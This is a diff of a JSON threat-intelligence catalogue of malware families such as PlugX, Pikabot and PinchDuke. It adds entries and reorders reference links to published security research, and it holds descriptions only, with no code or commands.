"https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp"
+ "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
],
"synonyms": [],
"type": []
@@ -35598,14 +37447,27 @@
"uuid": "58aff639-0eda-4a80-9fe8-22e0498af728",
"value": "Phoenix Locker"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phonk",
+ "https://twitter.com/abuse_ch/status/1630111198036348928"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e0aa3f91-59d6-4344-bcc5-d602aaab21f9",
+ "value": "Phonk"
+ },
{
"description": " Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal",
- "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
"https://elastic.github.io/security-research/intelligence/2022/03/02.phoreal-targets-southeast-asia-financial-sector/article/",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn"
+ "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf"
],
"synonyms": [
"Rizzo"
@@ -35620,24 +37482,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://twitter.com/_CPResearch_/status/1447852018794643457",
"https://research.checkpoint.com/2019/phorpiex-breakdown/",
- "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/",
- "https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/",
- "https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/",
- "https://www.johannesbader.ch/2016/02/phorpiex/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://bin.re/blog/phorpiex/",
+ "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
+ "https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/",
"https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html",
+ "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet",
"https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/",
- "https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/",
+ "https://www.johannesbader.ch/2016/02/phorpiex/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/",
"https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://twitter.com/_CPResearch_/status/1447852018794643457",
- "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
- "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/"
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/",
+ "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/",
+ "https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/",
+ "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows"
],
"synonyms": [
"Trik"
@@ -35652,18 +37515,31 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader",
- "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/",
- "https://twitter.com/felixw3000/status/1521816045769662468",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure",
- "https://isc.sans.edu/diary/28636",
- "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service",
- "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
"https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
+ "https://isc.sans.edu/diary/29740",
+ "https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary",
+ "https://www.team-cymru.com/post/from-chile-with-malware",
+ "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/",
+ "https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://research.openanalysis.net/icedid/bokbot/photoloader/config/2023/04/06/photoloader.html",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
+ "https://twitter.com/felixw3000/status/1521816045769662468",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/",
+ "https://blog.talosintelligence.com/following-the-lnk-metadata-trail",
+ "https://www.youtube.com/watch?v=4j8t9kFLFIY",
+ "https://isc.sans.edu/diary/28636",
+ "https://www.elastic.co/security-labs/unpacking-icedid",
+ "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service",
+ "https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing",
+ "https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1",
+ "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes",
+ "https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns",
"https://sysopfb.github.io/malware,/icedid/2020/04/28/IcedIDs-updated-photoloader.html",
- "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure"
],
"synonyms": [],
"type": []
@@ -35699,14 +37575,28 @@
"uuid": "2bda00e8-e6a7-448d-8dfa-4f2276230e8b",
"value": "Pierogi"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot",
+ "https://minerva-labs.com/blog/beepin-out-of-the-sandbox-analyzing-a-new-extremely-evasive-malware/",
+ "https://medium.com/@DCSO_CyTec/shortandmalicious-pikabot-and-the-matanbuchus-connection-5e302644398"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "992151e9-2d4d-4621-9a2e-f2219f97e55b",
+ "value": "Pikabot"
+ },
{
"description": "According to FireEye, PILLOWMINT is a Point-of-Sale malware tool used to scrape track 1 and track 2 payment card data from memory.\r\n Scraped payment card data is encrypted and stored in the registry and as plaintext in a file (T1074: Data Staged)\r\n Contains additional backdoor capabilities including:\r\n Running processes\r\n Downloading and executing files (T1105: Remote File Copy)\r\n Downloading and injecting DLLs (T1055: Process Injection)\r\n Communicates with a command and control (C2) server over HTTP using AES encrypted messages\r\n (T1071: Standard Application Layer Protocol)\r\n (T1032: Standard Cryptographic Protocol)\r\n\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint",
"https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf"
],
"synonyms": [],
"type": []
@@ -35714,6 +37604,19 @@
"uuid": "dec78ec5-f02d-461f-a8cc-cd4e80099e38",
"value": "PILLOWMINT"
},
+ {
+ "description": "According to F-Secure, the PinchDuke information stealer gathers system configuration information, steals user credentials, and collects user files from the compromised host transferring these via HTTP(S) to a C&C server. F-Secure believes that PinchDuke’s credential stealing functionality is based on the source code of the Pinch credential stealing malware (also known as LdPinch) that was developed in the early 2000s and has later been openly distributed on underground forums.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke",
+ "https://blog.f-secure.com/wp-content/uploads/2020/03/F-Secure_Dukes_Whitepaper.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d837fc8e-1298-4911-9cfd-eb434a25bf3a",
+ "value": "PinchDuke"
+ },
{
"description": "",
"meta": {
@@ -35746,8 +37649,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemon",
- "https://twitter.com/ESETresearch/status/1506904404225630210",
- "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/"
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
+ "https://twitter.com/ESETresearch/status/1506904404225630210"
],
"synonyms": [],
"type": []
@@ -35755,15 +37658,28 @@
"uuid": "34c0b51a-7139-44ab-b09a-cef646e66ba0",
"value": "PipeMon"
},
+ {
+ "description": "Infostealer",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirate_stealer",
+ "https://mostwanted002.cf/post/malware-analysis-and-triage-report-piratestealer/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "19748031-0d8d-4e76-bf8e-0838f8a3d07c",
+ "value": "PirateStealer"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi",
"https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html",
- "https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-mayfair",
+ "https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong",
"https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/"
],
"synonyms": [
@@ -35772,15 +37688,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "4859330d-c6a5-4b9c-b45b-536ec983cd4a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154",
"value": "pirpi"
},
@@ -35789,11 +37696,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou",
- "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884",
"https://isc.sans.edu/diary/rss/25068",
+ "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf",
+ "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884",
"http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.565.9211&rep=rep1&type=pdf",
- "https://johannesbader.ch/2019/07/the-dga-of-pitou/",
- "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf"
+ "https://johannesbader.ch/2019/07/the-dga-of-pitou/"
],
"synonyms": [],
"type": []
@@ -35838,23 +37745,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee",
- "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
"https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/",
- "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
- "https://unit42.paloaltonetworks.com/atoms/rancortaurus/"
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://unit42.paloaltonetworks.com/atoms/rancortaurus/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-overbrook"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "58b24db2-79d7-11e8-9b1b-bbdbc798af4f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876",
"value": "PLAINTEE"
},
@@ -35863,9 +37761,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.play",
+ "https://www.orangecyberdefense.com/global/blog/playing-the-game",
+ "https://chuongdong.com/reverse%20engineering/2022/09/03/PLAYRansomware/",
+ "https://www.bleepingcomputer.com/news/security/rackspace-confirms-play-ransomware-was-behind-recent-cyberattack/",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-play-ransomware",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy",
"https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.avertium.com/resources/threat-reports/an-in-depth-look-at-play-ransomware",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
"https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html",
- "https://chuongdong.com/reverse%20engineering/2022/09/03/PLAYRansomware/"
+ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65"
],
"synonyms": [
"PlayCrypt"
@@ -35893,29 +37799,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.plead",
- "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html",
- "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf",
- "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
- "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
- "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
- "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "http://www.freebuf.com/column/159865.html",
- "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html",
"https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/",
- "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html",
- "https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html",
- "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
"https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020",
- "https://securelist.com/apt-trends-report-q2-2019/91897/"
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
+ "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html",
+ "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html",
+ "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html",
+ "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt",
+ "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
+ "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html",
+ "http://www.freebuf.com/column/159865.html",
+ "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/"
],
"synonyms": [
"DRAWDOWN",
@@ -35932,13 +37838,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm",
+ "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf",
"https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html",
- "https://www.crowdstrike.com/blog/ploutus-atm-malware-deobfuscation-case-study",
- "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
- "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
"http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html",
"https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america",
- "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf"
+ "https://www.crowdstrike.com/blog/ploutus-atm-malware-deobfuscation-case-study",
+ "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html"
],
"synonyms": [],
"type": []
@@ -35951,8 +37857,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx",
- "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx",
- "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html"
+ "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html",
+ "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx"
],
"synonyms": [],
"type": []
@@ -35965,155 +37871,175 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx",
- "https://blog.xorhex.com/blog/mustangpandaplugx-1/",
- "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
- "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
- "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/",
- "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html",
- "https://securelist.com/time-of-death-connected-medicine/84315/",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://www.youtube.com/watch?v=r1zAVX_HnJg",
- "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/",
- "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.youtube.com/watch?v=6SDdUVejR2w",
- "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/",
- "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf",
- "https://unit42.paloaltonetworks.com/thor-plugx-variant/",
- "https://therecord.media/redecho-group-parks-domains-after-public-exposure/",
- "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/",
- "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
- "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/",
- "https://attack.mitre.org/groups/G0096",
- "https://twitter.com/xorhex/status/1399906601562165249?s=20",
- "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html",
- "https://twitter.com/stvemillertime/status/1261263000960450562",
- "https://www.contextis.com/en/blog/dll-search-order-hijacking",
- "https://blog.vincss.net/2022/05/re027-china-based-apt-mustang-panda-might-have-still-continued-their-attack-activities-against-organizations-in-Vietnam.html",
- "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf",
- "https://www.bleepingcomputer.com/news/security/new-mustang-panda-hacking-campaign-targets-diplomats-isps/",
- "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
- "https://www.secureworks.com/research/threat-profiles/bronze-olive",
- "https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution",
- "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
- "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/",
- "https://www.secureworks.com/research/threat-profiles/bronze-woodland",
- "https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers",
- "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
- "https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf",
- "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
+ "https://asec.ahnlab.com/en/49097/",
+ "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/",
+ "https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware",
"https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/",
- "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf",
- "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
- "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html",
- "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/",
- "https://www.secureworks.com/research/threat-profiles/bronze-express",
- "https://redalert.nshc.net/2022/04/14/hacking-activity-of-sectorb-group-in-2021/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf",
- "https://www.youtube.com/watch?v=E2_DTQJjDYc",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "https://tracker.h3x.eu/info/290",
- "https://www.lac.co.jp/lacwatch/people/20171218_001445.html",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
- "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/",
- "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
- "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/",
- "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-president",
- "https://community.rsa.com/thread/185439",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.contextis.com/en/blog/avivore",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html",
- "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
+ "https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://www.secureworks.com/research/threat-profiles/bronze-union",
"https://www.contextis.com/de/blog/avivore",
- "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/",
- "https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
- "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/",
- "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
